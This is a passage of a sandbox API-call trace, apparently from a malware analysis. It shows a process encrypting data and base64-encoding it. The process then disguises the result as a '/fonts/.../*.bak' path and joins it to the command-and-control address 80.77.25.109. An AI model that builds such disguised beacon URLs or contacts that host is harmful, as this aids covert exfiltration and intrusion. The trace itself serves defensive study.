returned 1 [0220.911] memcpy (in: _Dst=0x2c59c28, _Src=0x2c59b48, _Size=0x10 | out: _Dst=0x2c59c28) returned 0x2c59c28 [0220.912] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c28*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c28*, pdwDataLen=0x11ff074*=0x10) returned 1 [0220.912] memcpy (in: _Dst=0x2c59c38, _Src=0x2c59b58, _Size=0x10 | out: _Dst=0x2c59c38) returned 0x2c59c38 [0220.912] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c38*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c38*, pdwDataLen=0x11ff074*=0x10) returned 1 [0220.912] memcpy (in: _Dst=0x2c59c48, _Src=0x2c59b68, _Size=0x10 | out: _Dst=0x2c59c48) returned 0x2c59c48 [0220.912] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c48*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c48*, pdwDataLen=0x11ff074*=0x10) returned 1 [0220.912] memcpy (in: _Dst=0x2c59c58, _Src=0x2c59b78, _Size=0x10 | out: _Dst=0x2c59c58) returned 0x2c59c58 [0220.912] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c58*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c58*, pdwDataLen=0x11ff074*=0x10) returned 1 [0220.912] memcpy (in: _Dst=0x2c59c68, _Src=0x2c59b88, _Size=0x10 | out: _Dst=0x2c59c68) returned 0x2c59c68 [0220.912] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c68*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c68*, pdwDataLen=0x11ff074*=0x10) returned 1 [0220.912] memcpy (in: _Dst=0x2c59c78, _Src=0x2c59b98, _Size=0x10 | out: _Dst=0x2c59c78) returned 0x2c59c78 [0220.912] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c78*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c78*, pdwDataLen=0x11ff074*=0x10) returned 1 [0220.912] memcpy (in: _Dst=0x2c59c88, _Src=0x2c59ba8, _Size=0x10 | out: _Dst=0x2c59c88) returned 0x2c59c88 [0220.912] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c88*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c88*, pdwDataLen=0x11ff074*=0x10) returned 1 [0220.912] memcpy (in: _Dst=0x2c59c98, _Src=0x2c59bb8, _Size=0x10 | out: _Dst=0x2c59c98) returned 0x2c59c98 [0220.912] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c98*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c98*, pdwDataLen=0x11ff074*=0x10) returned 1 [0220.912] memcpy (in: _Dst=0x2c59ca8, _Src=0x2c59bc8, _Size=0x10 | out: _Dst=0x2c59ca8) returned 0x2c59ca8 [0220.912] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59ca8*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59ca8*, pdwDataLen=0x11ff074*=0x10) returned 1 [0220.912] memcpy (in: _Dst=0x2c59cb8, _Src=0x2c59bd8, _Size=0x10 | out: _Dst=0x2c59cb8) returned 0x2c59cb8 [0220.912] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59cb8*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59cb8*, pdwDataLen=0x11ff074*=0x10) returned 1 [0220.912] memcpy (in: _Dst=0x2c59cc8, _Src=0x2c59be8, _Size=0x10 | out: _Dst=0x2c59cc8) returned 0x2c59cc8 [0220.912] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59cc8*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59cc8*, pdwDataLen=0x11ff074*=0x10) returned 1 [0220.912] memcpy (in: _Dst=0x2c59cd8, _Src=0x2c59bf8, _Size=0x7 | out: _Dst=0x2c59cd8) returned 0x2c59cd8 [0220.912] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2c59cd8*, pdwDataLen=0x11ff074*=0x7, dwBufLen=0x20 | out: pbData=0x2c59cd8*, pdwDataLen=0x11ff074*=0x10) returned 1 [0220.912] CryptDestroyKey (hKey=0x77d2f8) returned 1 [0220.912] CryptReleaseContext (hProv=0x7917d8, dwFlags=0x0) [0220.912] CryptReleaseContext (hProv=0x7917d8, dwFlags=0x0) returned 1 [0220.913] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x1c0) returned 0x2c5fa38 [0220.913] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59c08 | out: hHeap=0x2860000) returned 1 [0220.913] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b28 | out: hHeap=0x2860000) returned 1 [0220.913] StrTrimA (psz="8epz1t/n86AmrKA6+0W9YmJPHIkhA0ubgXtp7Ab74sKTQ7xl27y9uBY0Kym1KE0KP9ZHZkOeoipurPeUiJBR4hFhFH5sWvFYdrytjkR+iKw+d/lPwkEznclwxYThsHuE9ASFkwICCs18FHB6xWjWqNI2qVZmNEFuY/WIMrDDqrWdKllAM/8g0zIcXpwblLRtZe83H5tTsdwnZhcNo/dF5b2knUq434OgN/3UwSVkjNEn0D50Bs/dl+0C6GuC/3ajDTMVyeFrLlpdfKml2JZpM9yiF0+iDzuUoQiEg2ek3Ee=", pszTrimChars="\r\n=") [0220.913] StrTrimA (in: psz="8epz1t/n86AmrKA6+0W9YmJPHIkhA0ubgXtp7Ab74sKTQ7xl27y9uBY0Kym1KE0KP9ZHZkOeoipurPeUiJBR4hFhFH5sWvFYdrytjkR+iKw+d/lPwkEznclwxYThsHuE9ASFkwICCs18FHB6xWjWqNI2qVZmNEFuY/WIMrDDqrWdKllAM/8g0zIcXpwblLRtZe83H5tTsdwnZhcNo/dF5b2knUq434OgN/3UwSVkjNEn0D50Bs/dl+0C6GuC/3ajDTMVyeFrLlpdfKml2JZpM9yiF0+iDzuUoQiEg2ek3Ee=", pszTrimChars="\r\n=" | out: psz="8epz1t/n86AmrKA6+0W9YmJPHIkhA0ubgXtp7Ab74sKTQ7xl27y9uBY0Kym1KE0KP9ZHZkOeoipurPeUiJBR4hFhFH5sWvFYdrytjkR+iKw+d/lPwkEznclwxYThsHuE9ASFkwICCs18FHB6xWjWqNI2qVZmNEFuY/WIMrDDqrWdKllAM/8g0zIcXpwblLRtZe83H5tTsdwnZhcNo/dF5b2knUq434OgN/3UwSVkjNEn0D50Bs/dl+0C6GuC/3ajDTMVyeFrLlpdfKml2JZpM9yiF0+iDzuUoQiEg2ek3Ee") returned 1 [0220.913] lstrlenA (lpString="8epz1t/n86AmrKA6+0W9YmJPHIkhA0ubgXtp7Ab74sKTQ7xl27y9uBY0Kym1KE0KP9ZHZkOeoipurPeUiJBR4hFhFH5sWvFYdrytjkR+iKw+d/lPwkEznclwxYThsHuE9ASFkwICCs18FHB6xWjWqNI2qVZmNEFuY/WIMrDDqrWdKllAM/8g0zIcXpwblLRtZe83H5tTsdwnZhcNo/dF5b2knUq434OgN/3UwSVkjNEn0D50Bs/dl+0C6GuC/3ajDTMVyeFrLlpdfKml2JZpM9yiF0+iDzuUoQiEg2ek3Ee") returned 299 [0220.914] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x382) returned 0x2c5fc00 [0220.914] _snprintf (_Dest=0x2c5fc06, _Count=0x4, _Format="%c%02X") [0220.914] _snprintf (in: _Dest=0x2c5fc06, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0220.914] _snprintf (in: _Dest=0x2c5fc12, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0220.914] _snprintf (in: _Dest=0x2c5fc6b, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0220.914] _snprintf (in: _Dest=0x2c5fc71, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0220.914] _snprintf (in: _Dest=0x2c5fc75, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0220.914] _snprintf (in: _Dest=0x2c5fcab, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0220.914] _snprintf (in: _Dest=0x2c5fcbd, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0220.914] _snprintf (in: _Dest=0x2c5fcdf, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0220.914] _snprintf (in: _Dest=0x2c5fcf1, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0220.914] _snprintf (in: _Dest=0x2c5fd04, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0220.914] _snprintf (in: _Dest=0x2c5fd09, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0220.914] _snprintf (in: _Dest=0x2c5fd12, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0220.914] _snprintf (in: _Dest=0x2c5fd32, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0220.914] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5fa38 | out: hHeap=0x2860000) returned 1 [0220.914] lstrlenA (lpString="8epz1t_2Fn86AmrKA6_2B0W9YmJPHIkhA0ubgXtp7Ab74sKTQ7xl27y9uBY0Kym1KE0KP9ZHZkOeoipurPeUiJBR4hFhFH5sWvFYdrytjkR_2BiKw_2Bd_2FlPwkEznclwxYThsHuE9ASFkwICCs18FHB6xWjWqNI2qVZmNEFuY_2FWIMrDDqrWdKllAM_2F8g0zIcXpwblLRtZe83H5tTsdwnZhcNo_2FdF5b2knUq434OgN_2F3UwSVkjNEn0D50Bs_2Fdl_2B0C6GuC_2F3ajDTMVyeFrLlpdfKml2JZpM9yiF0_2BiDzuUoQiEg2ek3Ee") returned 325 [0220.914] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x16e) returned 0x2c5fa38 [0220.914] memcpy (in: _Dst=0x2c5fa38, _Src=0x2c5fc00, _Size=0x16 | out: _Dst=0x2c5fa38) returned 0x2c5fa38 [0220.914] memcpy (in: _Dst=0x2c5fa4f, _Src=0x2c5fc16, _Size=0xd | out: _Dst=0x2c5fa4f) returned 0x2c5fa4f [0220.915] memcpy (in: _Dst=0x2c5fa5d, _Src=0x2c5fc23, _Size=0x8 | out: _Dst=0x2c5fa5d) returned 0x2c5fa5d [0220.915] memcpy (in: _Dst=0x2c5fa66, _Src=0x2c5fc2b, _Size=0x17 | out: _Dst=0x2c5fa66) returned 0x2c5fa66 [0220.915] memcpy (in: _Dst=0x2c5fa7e, _Src=0x2c5fc42, _Size=0xa | out: _Dst=0x2c5fa7e) returned 0x2c5fa7e [0220.915] memcpy (in: _Dst=0x2c5fa89, _Src=0x2c5fc4c, _Size=0x11 | out: _Dst=0x2c5fa89) returned 0x2c5fa89 [0220.915] memcpy (in: _Dst=0x2c5fa9b, _Src=0x2c5fc5d, _Size=0xc | out: _Dst=0x2c5fa9b) returned 0x2c5fa9b [0220.915] memcpy (in: _Dst=0x2c5faa8, _Src=0x2c5fc69, _Size=0xb | out: _Dst=0x2c5faa8) returned 0x2c5faa8 [0220.915] memcpy (in: _Dst=0x2c5fab4, _Src=0x2c5fc74, _Size=0xe | out: _Dst=0x2c5fab4) returned 0x2c5fab4 [0220.915] memcpy (in: _Dst=0x2c5fac3, _Src=0x2c5fc82, _Size=0x15 | out: _Dst=0x2c5fac3) returned 0x2c5fac3 [0220.915] memcpy (in: _Dst=0x2c5fad9, _Src=0x2c5fc97, _Size=0x10 | out: _Dst=0x2c5fad9) returned 0x2c5fad9 [0220.915] memcpy (in: _Dst=0x2c5faea, _Src=0x2c5fca7, _Size=0xf | out: _Dst=0x2c5faea) returned 0x2c5faea [0220.915] memcpy (in: _Dst=0x2c5fafa, _Src=0x2c5fcb6, _Size=0x12 | out: _Dst=0x2c5fafa) returned 0x2c5fafa [0220.915] memcpy (in: _Dst=0x2c5fb0d, _Src=0x2c5fcc8, _Size=0x9 | out: _Dst=0x2c5fb0d) returned 0x2c5fb0d [0220.915] memcpy (in: _Dst=0x2c5fb17, _Src=0x2c5fcd1, _Size=0x14 | out: _Dst=0x2c5fb17) returned 0x2c5fb17 [0220.915] memcpy (in: _Dst=0x2c5fb2c, _Src=0x2c5fce5, _Size=0x13 | out: _Dst=0x2c5fb2c) returned 0x2c5fb2c [0220.915] memcpy (in: _Dst=0x2c5fb40, _Src=0x2c5fcf8, _Size=0x16 | out: _Dst=0x2c5fb40) returned 0x2c5fb40 [0220.915] memcpy (in: _Dst=0x2c5fb57, _Src=0x2c5fd0e, _Size=0xd | out: _Dst=0x2c5fb57) returned 0x2c5fb57 [0220.915] memcpy (in: _Dst=0x2c5fb65, _Src=0x2c5fd1b, _Size=0x8 | out: _Dst=0x2c5fb65) returned 0x2c5fb65 [0220.915] memcpy (in: _Dst=0x2c5fb6e, _Src=0x2c5fd23, _Size=0x17 | out: _Dst=0x2c5fb6e) returned 0x2c5fb6e [0220.915] memcpy (in: _Dst=0x2c5fb86, _Src=0x2c5fd3a, _Size=0xa | out: _Dst=0x2c5fb86) returned 0x2c5fb86 [0220.915] memcpy (in: _Dst=0x2c5fb91, _Src=0x2c5fd44, _Size=0x2 | out: _Dst=0x2c5fb91) returned 0x2c5fb91 [0220.915] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5fc00 | out: hHeap=0x2860000) returned 1 [0220.915] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59a78 | out: hHeap=0x2860000) returned 1 [0220.915] StrTrimA (in: psz="8epz1t_2Fn86AmrKA6_2B0/W9YmJPHIkhA0u/bgXtp7Ab/74sKTQ7xl27y9uBY0Kym1KE/0KP9ZHZkOe/oipurPeUiJBR4hFhF/H5sWvFYdrytj/kR_2BiKw_2B/d_2FlPwkEznclw/xYThsHuE9ASFkwICCs18F/HB6xWjWqNI2qVZmN/EFuY_2FWIMrDDqr/WdKllAM_2F8g0zIcXp/wblLRtZe8/3H5tTsdwnZhcNo_2FdF5/b2knUq434OgN_2F3UwS/VkjNEn0D50Bs_2Fdl_2B0C/6GuC_2F3ajDTM/VyeFrLlp/dfKml2JZpM9yiF0_2BiDzuU/oQiEg2ek3E/e", pszTrimChars="\r\n" | out: psz="8epz1t_2Fn86AmrKA6_2B0/W9YmJPHIkhA0u/bgXtp7Ab/74sKTQ7xl27y9uBY0Kym1KE/0KP9ZHZkOe/oipurPeUiJBR4hFhF/H5sWvFYdrytj/kR_2BiKw_2B/d_2FlPwkEznclw/xYThsHuE9ASFkwICCs18F/HB6xWjWqNI2qVZmN/EFuY_2FWIMrDDqr/WdKllAM_2F8g0zIcXp/wblLRtZe8/3H5tTsdwnZhcNo_2FdF5/b2knUq434OgN_2F3UwS/VkjNEn0D50Bs_2Fdl_2B0C/6GuC_2F3ajDTM/VyeFrLlp/dfKml2JZpM9yiF0_2BiDzuU/oQiEg2ek3E/e") returned 0 [0220.915] lstrlenA (lpString="/fonts/") returned 7 [0220.915] lstrlenA (lpString="8epz1t_2Fn86AmrKA6_2B0/W9YmJPHIkhA0u/bgXtp7Ab/74sKTQ7xl27y9uBY0Kym1KE/0KP9ZHZkOe/oipurPeUiJBR4hFhF/H5sWvFYdrytj/kR_2BiKw_2B/d_2FlPwkEznclw/xYThsHuE9ASFkwICCs18F/HB6xWjWqNI2qVZmN/EFuY_2FWIMrDDqr/WdKllAM_2F8g0zIcXp/wblLRtZe8/3H5tTsdwnZhcNo_2FdF5/b2knUq434OgN_2F3UwS/VkjNEn0D50Bs_2Fdl_2B0C/6GuC_2F3ajDTM/VyeFrLlp/dfKml2JZpM9yiF0_2BiDzuU/oQiEg2ek3E/e") returned 346 [0220.916] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x162) returned 0x2c59b28 [0220.916] lstrcpyA (in: lpString1=0x2c59b28, lpString2="/fonts/" | out: lpString1="/fonts/") returned="/fonts/" [0220.916] lstrcatA (in: lpString1="/fonts/", lpString2="8epz1t_2Fn86AmrKA6_2B0/W9YmJPHIkhA0u/bgXtp7Ab/74sKTQ7xl27y9uBY0Kym1KE/0KP9ZHZkOe/oipurPeUiJBR4hFhF/H5sWvFYdrytj/kR_2BiKw_2B/d_2FlPwkEznclw/xYThsHuE9ASFkwICCs18F/HB6xWjWqNI2qVZmN/EFuY_2FWIMrDDqr/WdKllAM_2F8g0zIcXp/wblLRtZe8/3H5tTsdwnZhcNo_2FdF5/b2knUq434OgN_2F3UwS/VkjNEn0D50Bs_2Fdl_2B0C/6GuC_2F3ajDTM/VyeFrLlp/dfKml2JZpM9yiF0_2BiDzuU/oQiEg2ek3E/e" | out: lpString1="/fonts/8epz1t_2Fn86AmrKA6_2B0/W9YmJPHIkhA0u/bgXtp7Ab/74sKTQ7xl27y9uBY0Kym1KE/0KP9ZHZkOe/oipurPeUiJBR4hFhF/H5sWvFYdrytj/kR_2BiKw_2B/d_2FlPwkEznclw/xYThsHuE9ASFkwICCs18F/HB6xWjWqNI2qVZmN/EFuY_2FWIMrDDqr/WdKllAM_2F8g0zIcXp/wblLRtZe8/3H5tTsdwnZhcNo_2FdF5/b2knUq434OgN_2F3UwS/VkjNEn0D50Bs_2Fdl_2B0C/6GuC_2F3ajDTM/VyeFrLlp/dfKml2JZpM9yiF0_2BiDzuU/oQiEg2ek3E/e") returned="/fonts/8epz1t_2Fn86AmrKA6_2B0/W9YmJPHIkhA0u/bgXtp7Ab/74sKTQ7xl27y9uBY0Kym1KE/0KP9ZHZkOe/oipurPeUiJBR4hFhF/H5sWvFYdrytj/kR_2BiKw_2B/d_2FlPwkEznclw/xYThsHuE9ASFkwICCs18F/HB6xWjWqNI2qVZmN/EFuY_2FWIMrDDqr/WdKllAM_2F8g0zIcXp/wblLRtZe8/3H5tTsdwnZhcNo_2FdF5/b2knUq434OgN_2F3UwS/VkjNEn0D50Bs_2Fdl_2B0C/6GuC_2F3ajDTM/VyeFrLlp/dfKml2JZpM9yiF0_2BiDzuU/oQiEg2ek3E/e" [0220.916] lstrcpyA (in: lpString1=0x2c5fa38, lpString2=".bak" | out: lpString1=".bak") returned=".bak" [0220.916] lstrcpyA (in: lpString1=0x2be00d8, lpString2="80.77.25.109" | out: lpString1="80.77.25.109") returned="80.77.25.109" [0220.916] lstrcatA (in: lpString1="80.77.25.109", lpString2="/fonts/8epz1t_2Fn86AmrKA6_2B0/W9YmJPHIkhA0u/bgXtp7Ab/74sKTQ7xl27y9uBY0Kym1KE/0KP9ZHZkOe/oipurPeUiJBR4hFhF/H5sWvFYdrytj/kR_2BiKw_2B/d_2FlPwkEznclw/xYThsHuE9ASFkwICCs18F/HB6xWjWqNI2qVZmN/EFuY_2FWIMrDDqr/WdKllAM_2F8g0zIcXp/wblLRtZe8/3H5tTsdwnZhcNo_2FdF5/b2knUq434OgN_2F3UwS/VkjNEn0D50Bs_2Fdl_2B0C/6GuC_2F3ajDTM/VyeFrLlp/dfKml2JZpM9yiF0_2BiDzuU/oQiEg2ek3E/e" | out: lpString1="80.77.25.109/fonts/8epz1t_2Fn86AmrKA6_2B0/W9YmJPHIkhA0u/bgXtp7Ab/74sKTQ7xl27y9uBY0Kym1KE/0KP9ZHZkOe/oipurPeUiJBR4hFhF/H5sWvFYdrytj/kR_2BiKw_2B/d_2FlPwkEznclw/xYThsHuE9ASFkwICCs18F/HB6xWjWqNI2qVZmN/EFuY_2FWIMrDDqr/WdKllAM_2F8g0zIcXp/wblLRtZe8/3H5tTsdwnZhcNo_2FdF5/b2knUq434OgN_2F3UwS/VkjNEn0D50Bs_2Fdl_2B0C/6GuC_2F3ajDTM/VyeFrLlp/dfKml2JZpM9yiF0_2BiDzuU/oQiEg2ek3E/e") returned="80.77.25.109/fonts/8epz1t_2Fn86AmrKA6_2B0/W9YmJPHIkhA0u/bgXtp7Ab/74sKTQ7xl27y9uBY0Kym1KE/0KP9ZHZkOe/oipurPeUiJBR4hFhF/H5sWvFYdrytj/kR_2BiKw_2B/d_2FlPwkEznclw/xYThsHuE9ASFkwICCs18F/HB6xWjWqNI2qVZmN/EFuY_2FWIMrDDqr/WdKllAM_2F8g0zIcXp/wblLRtZe8/3H5tTsdwnZhcNo_2FdF5/b2knUq434OgN_2F3UwS/VkjNEn0D50Bs_2Fdl_2B0C/6GuC_2F3ajDTM/VyeFrLlp/dfKml2JZpM9yiF0_2BiDzuU/oQiEg2ek3E/e" [0220.916] lstrcatA (in: lpString1="80.77.25.109/fonts/8epz1t_2Fn86AmrKA6_2B0/W9YmJPHIkhA0u/bgXtp7Ab/74sKTQ7xl27y9uBY0Kym1KE/0KP9ZHZkOe/oipurPeUiJBR4hFhF/H5sWvFYdrytj/kR_2BiKw_2B/d_2FlPwkEznclw/xYThsHuE9ASFkwICCs18F/HB6xWjWqNI2qVZmN/EFuY_2FWIMrDDqr/WdKllAM_2F8g0zIcXp/wblLRtZe8/3H5tTsdwnZhcNo_2FdF5/b2knUq434OgN_2F3UwS/VkjNEn0D50Bs_2Fdl_2B0C/6GuC_2F3ajDTM/VyeFrLlp/dfKml2JZpM9yiF0_2BiDzuU/oQiEg2ek3E/e", lpString2=".bak" | out: lpString1="80.77.25.109/fonts/8epz1t_2Fn86AmrKA6_2B0/W9YmJPHIkhA0u/bgXtp7Ab/74sKTQ7xl27y9uBY0Kym1KE/0KP9ZHZkOe/oipurPeUiJBR4hFhF/H5sWvFYdrytj/kR_2BiKw_2B/d_2FlPwkEznclw/xYThsHuE9ASFkwICCs18F/HB6xWjWqNI2qVZmN/EFuY_2FWIMrDDqr/WdKllAM_2F8g0zIcXp/wblLRtZe8/3H5tTsdwnZhcNo_2FdF5/b2knUq434OgN_2F3UwS/VkjNEn0D50Bs_2Fdl_2B0C/6GuC_2F3ajDTM/VyeFrLlp/dfKml2JZpM9yiF0_2BiDzuU/oQiEg2ek3E/e.bak") returned="80.77.25.109/fonts/8epz1t_2Fn86AmrKA6_2B0/W9YmJPHIkhA0u/bgXtp7Ab/74sKTQ7xl27y9uBY0Kym1KE/0KP9ZHZkOe/oipurPeUiJBR4hFhF/H5sWvFYdrytj/kR_2BiKw_2B/d_2FlPwkEznclw/xYThsHuE9ASFkwICCs18F/HB6xWjWqNI2qVZmN/EFuY_2FWIMrDDqr/WdKllAM_2F8g0zIcXp/wblLRtZe8/3H5tTsdwnZhcNo_2FdF5/b2knUq434OgN_2F3UwS/VkjNEn0D50Bs_2Fdl_2B0C/6GuC_2F3ajDTM/VyeFrLlp/dfKml2JZpM9yiF0_2BiDzuU/oQiEg2ek3E/e.bak" [0220.916] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) [0220.916] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1c8 [0220.916] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x1c4 [0220.916] lstrlenA (lpString="80.77.25.109/fonts/8epz1t_2Fn86AmrKA6_2B0/W9YmJPHIkhA0u/bgXtp7Ab/74sKTQ7xl27y9uBY0Kym1KE/0KP9ZHZkOe/oipurPeUiJBR4hFhF/H5sWvFYdrytj/kR_2BiKw_2B/d_2FlPwkEznclw/xYThsHuE9ASFkwICCs18F/HB6xWjWqNI2qVZmN/EFuY_2FWIMrDDqr/WdKllAM_2F8g0zIcXp/wblLRtZe8/3H5tTsdwnZhcNo_2FdF5/b2knUq434OgN_2F3UwS/VkjNEn0D50Bs_2Fdl_2B0C/6GuC_2F3ajDTM/VyeFrLlp/dfKml2JZpM9yiF0_2BiDzuU/oQiEg2ek3E/e.bak") returned 369 [0220.916] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x172) returned 0x2c5fbb0 [0220.916] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x172) returned 0x2c5fd30 [0220.916] StrChrA (lpStart="80.77.25.109/fonts/8epz1t_2Fn86AmrKA6_2B0/W9YmJPHIkhA0u/bgXtp7Ab/74sKTQ7xl27y9uBY0Kym1KE/0KP9ZHZkOe/oipurPeUiJBR4hFhF/H5sWvFYdrytj/kR_2BiKw_2B/d_2FlPwkEznclw/xYThsHuE9ASFkwICCs18F/HB6xWjWqNI2qVZmN/EFuY_2FWIMrDDqr/WdKllAM_2F8g0zIcXp/wblLRtZe8/3H5tTsdwnZhcNo_2FdF5/b2knUq434OgN_2F3UwS/VkjNEn0D50Bs_2Fdl_2B0C/6GuC_2F3ajDTM/VyeFrLlp/dfKml2JZpM9yiF0_2BiDzuU/oQiEg2ek3E/e.bak", wMatch=0x2f) returned="/fonts/8epz1t_2Fn86AmrKA6_2B0/W9YmJPHIkhA0u/bgXtp7Ab/74sKTQ7xl27y9uBY0Kym1KE/0KP9ZHZkOe/oipurPeUiJBR4hFhF/H5sWvFYdrytj/kR_2BiKw_2B/d_2FlPwkEznclw/xYThsHuE9ASFkwICCs18F/HB6xWjWqNI2qVZmN/EFuY_2FWIMrDDqr/WdKllAM_2F8g0zIcXp/wblLRtZe8/3H5tTsdwnZhcNo_2FdF5/b2knUq434OgN_2F3UwS/VkjNEn0D50Bs_2Fdl_2B0C/6GuC_2F3ajDTM/VyeFrLlp/dfKml2JZpM9yiF0_2BiDzuU/oQiEg2ek3E/e.bak" [0220.916] StrChrA (lpStart="80.77.25.109/fonts/8epz1t_2Fn86AmrKA6_2B0/W9YmJPHIkhA0u/bgXtp7Ab/74sKTQ7xl27y9uBY0Kym1KE/0KP9ZHZkOe/oipurPeUiJBR4hFhF/H5sWvFYdrytj/kR_2BiKw_2B/d_2FlPwkEznclw/xYThsHuE9ASFkwICCs18F/HB6xWjWqNI2qVZmN/EFuY_2FWIMrDDqr/WdKllAM_2F8g0zIcXp/wblLRtZe8/3H5tTsdwnZhcNo_2FdF5/b2knUq434OgN_2F3UwS/VkjNEn0D50Bs_2Fdl_2B0C/6GuC_2F3ajDTM/VyeFrLlp/dfKml2JZpM9yiF0_2BiDzuU/oQiEg2ek3E/e.bak", wMatch=0x3f) returned 0x0 [0220.916] memcpy (in: _Dst=0x2c5fbb0, _Src=0x2be00d8, _Size=0xc | out: _Dst=0x2c5fbb0) returned 0x2c5fbb0 [0220.916] lstrcpyA (in: lpString1=0x2c5fd30, lpString2="/fonts/8epz1t_2Fn86AmrKA6_2B0/W9YmJPHIkhA0u/bgXtp7Ab/74sKTQ7xl27y9uBY0Kym1KE/0KP9ZHZkOe/oipurPeUiJBR4hFhF/H5sWvFYdrytj/kR_2BiKw_2B/d_2FlPwkEznclw/xYThsHuE9ASFkwICCs18F/HB6xWjWqNI2qVZmN/EFuY_2FWIMrDDqr/WdKllAM_2F8g0zIcXp/wblLRtZe8/3H5tTsdwnZhcNo_2FdF5/b2knUq434OgN_2F3UwS/VkjNEn0D50Bs_2Fdl_2B0C/6GuC_2F3ajDTM/VyeFrLlp/dfKml2JZpM9yiF0_2BiDzuU/oQiEg2ek3E/e.bak" | out: lpString1="/fonts/8epz1t_2Fn86AmrKA6_2B0/W9YmJPHIkhA0u/bgXtp7Ab/74sKTQ7xl27y9uBY0Kym1KE/0KP9ZHZkOe/oipurPeUiJBR4hFhF/H5sWvFYdrytj/kR_2BiKw_2B/d_2FlPwkEznclw/xYThsHuE9ASFkwICCs18F/HB6xWjWqNI2qVZmN/EFuY_2FWIMrDDqr/WdKllAM_2F8g0zIcXp/wblLRtZe8/3H5tTsdwnZhcNo_2FdF5/b2knUq434OgN_2F3UwS/VkjNEn0D50Bs_2Fdl_2B0C/6GuC_2F3ajDTM/VyeFrLlp/dfKml2JZpM9yiF0_2BiDzuU/oQiEg2ek3E/e.bak") returned="/fonts/8epz1t_2Fn86AmrKA6_2B0/W9YmJPHIkhA0u/bgXtp7Ab/74sKTQ7xl27y9uBY0Kym1KE/0KP9ZHZkOe/oipurPeUiJBR4hFhF/H5sWvFYdrytj/kR_2BiKw_2B/d_2FlPwkEznclw/xYThsHuE9ASFkwICCs18F/HB6xWjWqNI2qVZmN/EFuY_2FWIMrDDqr/WdKllAM_2F8g0zIcXp/wblLRtZe8/3H5tTsdwnZhcNo_2FdF5/b2knUq434OgN_2F3UwS/VkjNEn0D50Bs_2Fdl_2B0C/6GuC_2F3ajDTM/VyeFrLlp/dfKml2JZpM9yiF0_2BiDzuU/oQiEg2ek3E/e.bak" [0220.916] lstrlenA 